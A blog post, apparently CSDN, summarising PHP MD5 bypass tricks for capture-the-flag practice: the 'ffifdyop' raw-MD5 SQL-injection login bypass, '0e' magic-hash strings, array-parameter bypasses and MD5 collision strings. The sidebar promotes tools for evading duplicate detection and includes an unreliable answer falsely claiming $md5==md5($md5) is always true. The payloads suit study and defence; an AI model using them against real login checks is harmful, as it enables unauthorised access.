md5绕过总结

于 2024-07-31 18:02:02 发布
阅读量234 收藏
点赞数 10
文章标签: java 服务器 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80307383/article/details/140827718
版权

1.万能密码

md5($pass,true)

传入ffifdyop,这个字符串经过md5加密后为276f722736c95d99e921722cf9ed621c

在转为字符串为'or'6�]��!r,��b

用途:

$password=$_POST['password'];
$sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'";

传入ffifdyop后相当于select * from admin where password=''or 1 

与之类似的还有

129581926211651571912466741651878684928

这个字符串转换后为

�T0D��o#��'or'8

2.弱类型

0e绕过md5($a)==md5($b)&&$a!=$b

原理是php在处理时会将0e开头的字符串理解为0

QNKCDZO
s214587387a
s878926199a
s155964671a

还有要求$a==md5($a)有

0e215962017 0e291242476940776845150308577824

0e1284838308 0e708279691820928818722257405159

0e1137126905 0e291659922323405260514745084877

0e807097110 0e318093639164485566453180786895

0e730083352 0e870635875304277170259950255928

3.强类型

数组绕过md5($a)===md5($b)&&$a!==$b

原理:md5对数组加密结果为NULL

传入a[]=1&b[]=2即可绕过,数组绕过也可用于弱类型

或用加密后相同的字符串

$s1 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab"
$s2 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%6d%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%27%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%66%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%96%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%b3%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%ef%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%5f%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%f3%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%e9%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%13%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%a8%1b%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%39%05%39%95%ab"
$s3 = "%af%13%76%70%82%a0%a6%58%cb%3e%23%38%c4%c6%db%8b%60%2c%bb%90%68%a0%2d%e9%47%aa%78%49%6e%0a%c0%c0%31%d3%fb%cb%82%25%92%0d%cf%61%67%64%e8%cd%7d%47%ba%0e%5d%1b%9c%1c%5c%cd%07%2d%f7%a8%2d%1d%bc%5e%2c%06%46%3a%0f%2d%4b%e9%20%1d%29%66%a4%e1%8b%7d%0c%f5%ef%97%b6%ee%48%dd%0e%09%aa%e5%4d%6a%5d%6d%75%77%72%cf%47%16%a2%06%72%71%c9%a1%8f%00%f6%9d%ee%54%27%71%be%c8%c3%8f%93%e3%52%73%73%53%a0%5f%69%ef%c3%3b%ea%ee%70%71%ae%2a%21%c8%44%d7%22%87%9f%be%79%ed%c4%61%a4%08%57%02%82%2a%ef%36%95%da%ee%13%bc%fb%7e%a3%59%45%ef%25%67%3c%e0%a7%69%2b%95%77%b8%cd%dc%4f%de%73%24%e8%ab%e6%74%d2%8c%68%06%80%0c%dd%74%ae%31%05%d1%15%7d%c4%5e%bc%0b%0f%21%23%a4%16%7c%17%12%d1%2b%b3%10%b7%37%60%68%d7%cb%35%5a%54%97%08%0d%54%78%49%d0%93%c3%33%fd%1f%0b%35%11%9d%96%1d%ba%64%e0%86%ad%6f%52%98%2d%84%12%77%bb%ab%e8%64%da%a3%65%55%5d%d5%76%55%57%46%6c%89%c9%df%b2%3c%85%97%1e%f6%38%66%c9%17%22%e7%ea%c9%f5%d2%e0%14%d8%35%4f%0a%5c%34%d3%73%a5%98%f7%66%72%aa%43%e3%bd%a2%cd%62%fd%69%1d%34%30%57%52%ab%41%b1%91%65%f2%30%7f%cf%c6%a1%8c%fb%dc%c4%8f%61%a5%93%40%1a%13%d1%09%c5%e0%f7%87%5f%48%e7%d7%b3%62%04%a7%c4%cb%fd%f4%ff%cf%3b%74%28%1c%96%8e%09%73%3a%9b%a6%2f%ed%b7%99%d5%b9%05%39%95%ab"

记嘚开心壹点
关注
  • 10
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
MD5绕过(强弱类型比较)
weixin_43332695的博客
08-03 7060
文章目录前言一、强类型比较(===)和弱类型(==)比较区别二、MD5弱类型绕过1.0e绕过2.数组绕过三、MD5强类型绕过1、2、数组绕过四、特定条件下的MD验证绕过:ffifdyop总结 前言 在刷题的时候遇到,强弱类型比较和MD5的验证,就简单的总结记录一下 一、强类型比较(=)和弱类型()比较区别 首先,我们来看一下php对类型比较的解释 松散比较也就是弱类型比较,严格比较就是强类型比较 a==b:弱类型比较会将a和b转成统一数据类型在进行比较,而强类型比较会先判断a和b是不是相同类型,不是
视频MD5值工器
11-11
“反和谐”这个词在这个上下文中可能是指使用该工具来绕过某些平台的审查机制。一些平台可能会检测视频的MD5值来识别并屏蔽特定内容。用户可以通过微小的视频内容修改(如添加噪声、裁剪帧等)改变MD5值,从而避开...
MD5绕过总结
qq_74035288的博客
05-14 253
数组绕过
ctf中MD5绕过详细总结及例题[BJDCTF2020]Easy MD5
m0_56691564的博客
10-18 4808
MD5()函数简单了解及ctf中常见绕过技巧,结尾附加例题。
关于MD5绕过
wikey 的博客
03-30 219
如何生成两个不一样的字符串,但是MD5是一样的呢。参考如何用不同的数值构建一样的MD5后,我们可以使用快速MD5碰撞生成器来构建两个MD5一样,但内容完全不一样的字符串。2.第二个方法是用特殊的0e开头的字符串,需要注意的地方是,这个以0e开头的字符串只能是纯数字,这样php在进行科学计算法的时候才会将它转化为0。1.也可以传入两个数组,但不再适合传入两个0e开头的字符串,因为===是md5的强碰撞,进行了严格的过滤。1.第一个方法就是用数组绕过,考虑到md5不会处理数组的情况,可以直接用数组。
md5绕过
2302_79359652的博客
03-10 850
类型比较:松散比较:使用两个等号比较,只比较值,不比较类型。严格比较:用三个等号比较,除了比较值,也比较类型。
md5一些绕过方法
m0_56059226的博客
07-16 2574
弱比较 if($_POST['a']!=$_POST['b']&& md5($_POST['a'])==md5($_POST['b'])){ die("success!"); } 在这样的弱比较里,0e开头的会被识别成科学计数法,结果均为0,比较时0=0为true绕过 payload: a=QNKCDZO&b=s878926199a 常用md5加密后为0的字符串: 240610708,aabg7XSs,aabC9RqS s878926199a 0e215962017...
MD5绕过 --- CTF
那酷小样的博客
10-19 7913
如:if(v1 !=v2 && md5(v1) == md5(v2)):{ return true; } 绕过 根据MD5的特性,有两点漏洞 1.两个开头为0的md5值相同。 2.md5不能处理数组。 绕过: 方法1:v1,v2 找到两个开头为0的md5值,例如:v1=s878926199a&&v2=s155964671a 方法2:根据md5函数特性,用两个值不同但...
总结ctf中 MD5 绕过的一些思路
热门推荐
y0un9er
10-02 1万+
总结ctf中 MD5 绕过的一些思路,包括在PHP弱类型比较中 0e 、数组、MD5后的值等于原值,以及强比较的MD5碰撞
【超全总结】CTF常见的MD5绕过漏洞和应对方法
M0nH1N的博客
08-06 5531
$str1 = $_GET['str1'];$str2 = $_GET['str2'];if (md5($str1) == md5($str2)){die('OK'); } php弱类型比较产生的漏洞 想要满足这个判断只需要构造出MD5值为0e开头的字符串,这样的话弱类型比较会认为是科学技术法,0的多少次方都是0,因此可以绕过 有一些字符串的MD5值为0e开头,这里记录一下 QNKCDZO 240610708 s878926199a s155964671a s2145
MD5绕过(强弱类型比较)_md5强比较绕过
最新发布
2401_84302369的博客
05-17 482
没有总结,凑合看吧。
视频MD5修改工具(短视频去重)
10-18
需要注意的是,虽然MD5修改工具可以帮助用户绕过短视频平台的去重机制,但这并不意味着可以滥用。许多平台已经升级了检测机制,除了MD5外,还可能会使用更复杂的算法,如视频指纹(Video Fingerprinting)来识别重复...
自媒体批量视频MD5修改.zip
04-29
总结来说,这个"自媒体批量视频MD5修改.zip"工具是一个专为自媒体从业者设计的高效工具,它能够快速、批量地修改视频的MD5值,帮助用户绕过平台的重复内容检测,从而在不同平台发布相同内容的视频而不会被识别为重复...
ctf总结.md
05-14
firebug修改源码绕过本地验证(有视频) 题目 答案 CTF中源代码中一般有提示或者有敏感信息,建议养成看源代码的习惯 ctrl加F通用的搜索快捷键。 这个题真是全程看源代码,快捷方式:F12 题目 答案 2. http头(不难):...
CTF知识总结,写的不错
10-29
- **MD5短截**:有时,MD5哈希的前几位可能被用来进行简化的比较,了解其性质对于绕过某些限制有帮助。 - **`short_open_tag`**:当开启此配置时,PHP允许使用`代替`来开始脚本,这可能影响代码的解析。 - **`...
nginx cache 学习总结 1
08-03
例如,可以使用 `$cookie_nocache` 或 `$arg_nocache` 来决定是否绕过缓存。 3. **proxy_cache_key**: - `proxy_cache_key string;` 指令用于定义缓存条目的键,这决定了如何将请求映射到缓存中的数据。默认键...
大学物理刚体部分知识点总结.docx
12-02
* 球体〔质量为 m,半径为 R〕过球心 2mR^2 / 5 * 薄球壳〔质量为 m,半径为 R〕过球心 2mR^2 / 3 平行轴定理和转动惯量的可加性: 1. 平行轴定理:设刚体相对于通过质心轴线的转动惯量为 Ic,相对于与之平行的另...
2020-12-01-DVWA.md
01-24
- 比如,使用管道符号`|`或逻辑或`||`仍然可以绕过这种简单的过滤。 - 例如,输入`127.0.0.1 | ipconfig`,尽管`&&`和`;`被过滤掉了,但`|`仍可使攻击生效。 **实验结果**: 由于`|`和`||`未被过滤,依然可以实现...
2020-12-06-DVWA之sql.md
01-24
但需要注意的是,即使采用了这种防御手段,如果使用不当,仍然可能被绕过。 **具体防御机制分析:** - `mysqli_real_escape_string`函数的作用是对特殊字符进行转义处理,防止它们被解释为SQL的一部分。 - 攻击者...
$md5 == md5($md5)怎么绕过
04-03
对于给定的表达式$md5 == md5($md5),它是一个简单的条件判断语句,用于比较变量$md5的MD5哈希值是否与其自身的MD5哈希值相等。在正常情况下,这个条件判断应该始终返回true。 然而,如果你想要绕过这个条件判断,可能有以下几种方法: 1. 修改$md5的值:你可以尝试修改$md5的值,使其与其MD5哈希值不相等。这可以通过手动计算不同的字符串的MD5哈希值来实现。 2. 修改MD5算法:你可以尝试修改MD5算法的实现,以使其在计算$md5的MD5哈希值时产生不同的结果。这需要对MD5算法有深入的了解和修改能力。 3. 利用哈希碰撞:哈希碰撞是指找到两个不同的输入,但它们的哈希值相同。你可以尝试找到一个与$md5不同但具有相同MD5哈希值的输入。然而,找到这样的碰撞是非常困难的,并且需要大量的计算资源和时间。 请注意,绕过条件判断是一种不推荐的行为,可能会违反系统的安全性和完整性。在实际应用中,应该遵循安全编码的最佳实践,确保数据的完整性和安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值